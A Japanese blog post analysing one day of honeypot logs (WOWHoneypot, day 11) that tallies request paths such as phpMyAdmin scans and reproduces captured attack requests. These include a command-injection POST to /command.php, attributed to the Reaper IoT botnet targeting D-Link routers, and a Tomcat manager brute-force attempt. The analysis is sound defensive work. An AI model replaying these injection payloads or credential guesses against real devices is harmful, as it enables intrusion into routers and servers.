WOWHoneypot簡易分析(11日目)
WOWhoneypotの2018/6/14(木)(運用11日目)の簡易分析です。
本日の総アクセス数は413件です。一気に倍近いのアクセスが来てビックリです。
$ awk '/06-14/{print $1,$5,$6}' /var/log/wowhoneypot/access_log | sort | uniq -c | sort -nr
163 [2018-06-14 "GET /
153 [2018-06-14 "POST /command.php
41 [2018-06-14 "GET /manager/html
10 [2018-06-14 "HEAD /
1 [2018-06-14 "PROPFIND /
1 [2018-06-14 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-14 "HEAD hxxp://180.163.113[.]82/check_proxy
1 [2018-06-14 "GET /xampp/phpmyadmin/index.php
1 [2018-06-14 "GET /www/phpMyAdmin/index.php
1 [2018-06-14 "GET /web/phpMyAdmin/index.php
1 [2018-06-14 "GET /upload/bank-icons/bank-gh.jpg
1 [2018-06-14 "GET /upload/bank-icons/bank_16.png
1 [2018-06-14 "GET /typo3/phpmyadmin/index.php
1 [2018-06-14 "GET /tools/phpMyAdmin/index.php
1 [2018-06-14 "GET /stssys.htm
1 [2018-06-14 "GET /pmd/index.php
1 [2018-06-14 "GET /pma-old/index.php
1 [2018-06-14 "GET /pmamy2/index.php
1 [2018-06-14 "GET /PMA/index.php
1 [2018-06-14 "GET /pma/index.php
1 [2018-06-14 "GET /PMA2/index.php
1 [2018-06-14 "GET /phpMyAdminold/index.php
1 [2018-06-14 "GET /phpMyAdmin.old/index.php
1 [2018-06-14 "GET /phpmyadmin-old/index.php
1 [2018-06-14 "GET /phpMyAdmin/index.php
1 [2018-06-14 "GET /phpmyadmin/index.php
1 [2018-06-14 "GET /phpMyadmin_bak/index.php
1 [2018-06-14 "GET /phpmyadmin2/index.php
1 [2018-06-14 "GET /phpmyadmin1/index.php
1 [2018-06-14 "GET /phpadmin/index.php
1 [2018-06-14 "GET /mysqladmin/index.php
1 [2018-06-14 "GET /mysql-admin/index.php
1 [2018-06-14 "GET /myadmin2/index.php
1 [2018-06-14 "GET /index.php
1 [2018-06-14 "GET hxxp://httpheader.net/
1 [2018-06-14 "GET hxxp://clientapi.ipip[.]net/echo.php?info=20180614062859
1 [2018-06-14 "GET hxxp://114.215.207[.]183:83/index.php
1 [2018-06-14 "GET hxxp://112.124.127[.]162:83/index.php
1 [2018-06-14 "GET /.git/config
1 [2018-06-14 "GET /db/index.php
1 [2018-06-14 "GET /dbadmin/index.php
1 [2018-06-14 "GET /claroline/phpMyAdmin/index.php
1 [2018-06-14 "GET /cgi/common.cgi
1 [2018-06-14 "GET /admin/PMA/index.php
1 [2018-06-14 "GET /admin/pma/index.php
1 [2018-06-14 "GET /admin/phpMyAdmin/index.php
1 [2018-06-14 "GET /admin/phpmyadmin/index.php
1 [2018-06-14 "GET /admin/mysql/index.php
1 [2018-06-14 "GET /admin/mysql2/index.php
1 [2018-06-14 "GET /admin/index.php
いつものようにindex.phpを除きます。
$ awk '/06-14/{print $1,$5,$6}' /var/log/wowhoneypot/access_log | sort | uniq -c | sort -nr | grep -v index.php
163 [2018-06-14 "GET /
153 [2018-06-14 "POST /command.php
41 [2018-06-14 "GET /manager/html
10 [2018-06-14 "HEAD /
1 [2018-06-14 "PROPFIND /
1 [2018-06-14 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-14 "HEAD hxxp://180.163.113[.]82/check_proxy
1 [2018-06-14 "GET /upload/bank-icons/bank-gh.jpg
1 [2018-06-14 "GET /upload/bank-icons/bank_16.png
1 [2018-06-14 "GET /stssys.htm
1 [2018-06-14 "GET hxxp://httpheader[.]net/
1 [2018-06-14 "GET hxxp://clientapi.ipip[.]net/echo.php?info=20180614062859
1 [2018-06-14 "GET /.git/config
1 [2018-06-14 "GET /cgi/common.cgi
本日大量に来ていたcommnad.phpのリクエストの中身は以下の通りでした。
POST /command.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Wget(linux)
Content-Length: 208cmd=cd /var/tmp && echo -ne \\x00\\x00\\x00\\x00\\x00 >> drop && echo OK
これは5日目に来ていたものと同一と思われます。
Reaper というIoTボットネット/マルウェアが対象としている D-Link DIR-600とDIR-300 への攻撃かと思われます。
Reaperボットネットに関する簡単なまとめ - 忙しい人のためのサイバーセキュリティニュース
また、昨日と同様以下のアクセスがありました。Tomcatの管理ページに対するブルートフォース攻撃と思われます。
GET /manager/html HTTP/1.1
Content-Type: text/html
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
Authorization: Basic dXNlcjpzM2NyZXQ=
新しいものとして、以下がありました。詳細は不明ですが、画像ファイルが存在するかの調査行為のように思えます。
GET /upload/bank-icons/bank-gh.jpg HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: hxxp://(ipaddr):80/upload/bank-icons/bank-gh.jpg
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Connection: Keep-Alive
Cache-Control: no-cacheGET /upload/bank-icons/bank_16.png HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: hxxxp://(ipaddr):80/upload/bank-icons/bank_16.png
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Connection: Keep-Alive
Cache-Control: no-cache
その他細かいものは後日調べようと思います…
ハンティングログには残っていませんでした。
以上です。
